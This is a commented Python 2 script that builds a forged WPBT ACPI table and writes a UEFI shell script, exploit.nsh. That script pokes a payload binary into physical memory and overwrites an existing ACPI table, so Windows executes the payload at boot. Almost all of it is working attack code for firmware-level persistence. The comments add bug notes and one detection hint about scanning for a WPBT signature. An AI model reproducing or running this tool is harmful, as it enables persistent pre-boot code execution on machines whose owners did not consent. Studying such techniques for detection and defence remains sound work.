import binascii
import os
import struct
# Python 2 script (note the xrange() loops and the 1-char str indexing of
# payload_data below). It assembles a WPBT (Windows Platform Binary Table)
# ACPI table that describes a payload binary, then writes a UEFI shell
# script, exploit.nsh, whose `mm` (memory modify) commands copy the payload
# into physical memory and overwrite an existing ACPI table with the WPBT.
# From a detection standpoint, the artifact this leaves behind is a WPBT
# entry in the ACPI table set whose handoff address points at the payload;
# enumerating ACPI tables for a WPBT signature is the obvious check.
#Target address to place binary at , location must persist past ExitBootService
# (the WPBT handoff address below points here, so the payload bytes must
# survive the OS taking over memory after ExitBootServices).
BINARY_LOCATION_ADDRESS=0x7BB76000
#Address of target ACPI table to replace
ACPI_TABLE_ADDRESS=0x7BBC4000
payload_filename = "native_test_c_temp.bin"
# NOTE(review): opened in binary mode and read once below, but never closed.
payload_file = open(payload_filename, "rb")
PAYLOAD_FILE_SIZE=os.path.getsize(payload_filename)
# 36-byte standard ACPI table header, with placeholder 'A' bytes for the
# OEM/creator strings:
#   'WPBT'          signature
#   0x34 (52)       total table length: 36 header bytes + 16 WPBT body bytes
#   0x01            revision
#   0x00            checksum, filled in below
#   'AAAAAA'        OEMID (6 bytes)
#   'AAAAAAAA'      OEM table ID (8 bytes)
#   0x00000001      OEM revision
#   'AAAA'          creator ID
#   0x00040000      creator revision
wpbt = bytearray(b'\x57\x50\x42\x54\x34\x00\x00\x00\x01\x00\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x01\x00\x00\x00\x41\x41\x41\x41\x00\x00\x04\x00')
# WPBT body: handoff memory size (u32, little-endian) = payload file size,
# handoff memory location (u64, little-endian) = BINARY_LOCATION_ADDRESS.
wpbt.extend(struct.pack("<L", PAYLOAD_FILE_SIZE))
wpbt.extend(struct.pack("<Q", BINARY_LOCATION_ADDRESS))
# Reads as two little-endian u16 fields both equal to 1 -- presumably the
# WPBT content-layout and content-type fields; confirm against the spec.
wpbt.extend(bytearray(b'\x01\x01\x00\x00'))
#Calculate 2's complement ACPI checksum: the byte at offset 9 must make all
# bytes of the table sum to zero modulo 256. The loop does this in a
# roundabout way: format(b, 'b') renders each byte as a string of binary
# digits, which is reparsed as a *decimal* int, negated via ~x + 1, and the
# resulting "-1010111"-style string is then reparsed in base 2. Net effect:
# intbits == -wpbt[x], so _sum == -sum(wpbt) and _2sComp == (-sum(wpbt)) % 256.
# This is only correct because wpbt[9] is still 0 while summing.
_sum=0
for x in range(0,len(wpbt)):
    filebits = int(''.join(format(wpbt[x], 'b') ))  # binary digits read as a decimal int
    bits = ~filebits
    bits += 1  # ~x + 1 == -x
    intbits=int(str(bits),2)  # back in base 2: equals -wpbt[x]
    _sum=_sum+intbits
_2sComp = _sum%256
# Python 2: bytearray item assignment accepts the 1-byte str from struct.pack;
# Python 3 would require an int here.
wpbt[9]=struct.pack("B", _2sComp)
# Debug aid (Python 2 print statement): hex dump of the finished table.
#print ''.join('{:02x}'.format(x) for x in wpbt)
start = BINARY_LOCATION_ADDRESS
end = start + PAYLOAD_FILE_SIZE
payload_data = payload_file.read()
# `file` shadows the Python 2 builtin of the same name. The script writes
# explicit '\r\n' line endings in text mode; on Windows, text mode would
# expand the '\n' again -- presumably this is run on a POSIX host, confirm.
file = open('exploit.nsh', 'w')
file.write('echo -off\r\n')
# One `mm ... -w 8` command per 8-byte chunk of the payload. The eight
# hexlify() calls are ordered from offset +7 down to +0 so the 8-byte value
# is written little-endian. Indexing payload_data yields a 1-char str
# (Python 2). NOTE(review): the stride of 8 assumes PAYLOAD_FILE_SIZE is a
# multiple of 8; otherwise the final chunk raises IndexError.
for i in xrange(start, end,8 ):
    file.write('mm 0x'+format(i, 'X')+' -w 8 0x'+binascii.hexlify(payload_data[i-start+7])+binascii.hexlify(payload_data[i-start+6])+binascii.hexlify(payload_data[i-start+5])+binascii.hexlify(payload_data[i-start+4])+binascii.hexlify(payload_data[i-start+3])+binascii.hexlify(payload_data[i-start+2])+binascii.hexlify(payload_data[i-start+1])+ binascii.hexlify(payload_data[i-start])+'\r\n')
file.write('echo Done uploading payload file to memory\r\n')
# Overwrite the table at ACPI_TABLE_ADDRESS byte by byte with the WPBT
# (one `mm ... -w 1` command per byte).
for i in xrange(ACPI_TABLE_ADDRESS, ACPI_TABLE_ADDRESS+len(wpbt),1 ):
    file.write('mm 0x'+format(i, 'X')+' -w 1 '+hex(wpbt[i-ACPI_TABLE_ADDRESS])+'\r\n')
file.write('echo Done patching ACPI table\r\n')
file.write('echo -on\r\n')
#Example of a last line in the script to go ahead and start windows.
#file.write('fs1:\\EFI\\Microsoft\\Boot\\bootmgfw.efi\r\n')
file.close()